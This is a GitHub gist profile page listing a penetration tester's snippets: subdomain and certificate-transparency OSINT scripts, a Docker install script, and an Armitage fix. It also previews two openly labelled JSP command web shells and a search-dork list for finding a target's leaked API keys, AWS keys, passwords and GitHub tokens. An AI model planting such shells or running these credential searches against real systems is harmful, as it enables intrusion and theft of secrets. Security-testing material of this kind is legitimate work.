Skip to content

Instantly share code, notes, and snippets.

View nikallass's full-sized avatar

Nikita Medvedev nikallass

37 followers · 8 following
View GitHub Profile
@nikallass
nikallass / Kali 2017.1 x64, Docker-ce Install script
Last active January 3, 2024 11:12
Kali 2017.1 x64, Docker-ce Install script
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get remove docker docker-engine docker.io* lxc-docker*
# install dependencies 4 cert
@nikallass
nikallass / crt.sh
Last active October 14, 2021 21:47
Certificate Transparency OSINT tool. It uses https://crt.sh/ to query domain name.
#!/bin/bash
if [ "$1" == "-h" ] || [ "$1" == "--help" ] || [[ $# -eq 0 ]]
then
me=`basename "$0"`
echo "Find subdomains in certificate transparency log."
echo -e "Usage:\n\t./${me} [domain]"
echo -e "Example:\n\t./${me} example.com"
exit 1
fi
@nikallass
nikallass / portinfo.sh
Created March 21, 2018 15:44
#!/bin/bash
if [ "$1" == "-h" ] || [ "$1" == "--help" ]
then
me=`basename "$0"`
echo "Find information about TCP/IP ports."
echo -e "Usage:\n\t./${me} [port|service]"
echo -e "Example:\n\t./${me} snmp\n\t./${me} 3389"
exit 1
fi
@nikallass
nikallass / cmd.jsp
Created April 30, 2018 16:54
Simple JSP cmd shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
@nikallass
nikallass / file-browser.jsp
Last active April 18, 2023 04:32
File browser + cmd JSP shell (win+linux without modification)
<%--
jsp File browser 1.2.1
nikallass added OS check, so shell can be executed on Windows and Linux without modifying now.
Copyright (C) 2003-2006 Boris von Loesch
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.
@nikallass
nikallass / meterpreter.sl
Created May 10, 2018 15:37
Fix armitage scan crash
in armitage/armitage.jar
in /scripts/meterpreter.sl
replace line 381:
from: if ($text ismatch '... (.*?):(\d+) - TCP OPEN') {
to: if ($text ismatch '... (.*?): +- \1:(\d+) - TCP OPEN') {
@nikallass
nikallass / ptrarc.sh
Last active April 30, 2021 16:50
Search PTRarchive for subdomains and IPs
#!/bin/bash
if [ "$1" == "-h" ] || [ "$1" == "--help" ] || [[ $# -eq 0 ]]
then
me=`basename "$0"`
echo "Find subdomains in PTR-archive http://ptrarchive.com/tools/search.htm?date=ALL&label=example.com"
echo -e "Usage:\n\t./${me} [domain]"
echo -e "Example:\n\t./${me} example.com"
echo -e "\t./${me} -v example.com # Verbose output, includes IPs."
exit 1
@nikallass
nikallass / github-recon
Created July 2, 2018 16:21 — forked from ehsahil/github-recon
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@nikallass
nikallass / subdomain.rb
Last active October 13, 2019 21:32 — forked from ehsahil/subdomain.rb
Subdomain OSINT script, running several best tools.
#Tools based on a resolver.rb by @melvinsh
#Repository: https://github.com/melvinsh/subresolve
#Modified by @ehsahil for Personal Use.
#Modified by @nikallass for Personal Use.
require 'socket'
require 'colorize'
begin
if ARGV[0] == nil
@nikallass
nikallass / letsencrypt-webroot-apache.md
Created September 4, 2018 11:47 — forked from daronco/letsencrypt-webroot-apache.md
Letsencrypt with webroot on Apache

Config Apache with /etc/apache2/conf-available/le.conf:

Alias /.well-known/acme-challenge/ "/var/www/html/.well-known/acme-challenge/"
<Directory "/var/www/html/">
    AllowOverride None
    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
    Require method GET POST OPTIONS
</Directory>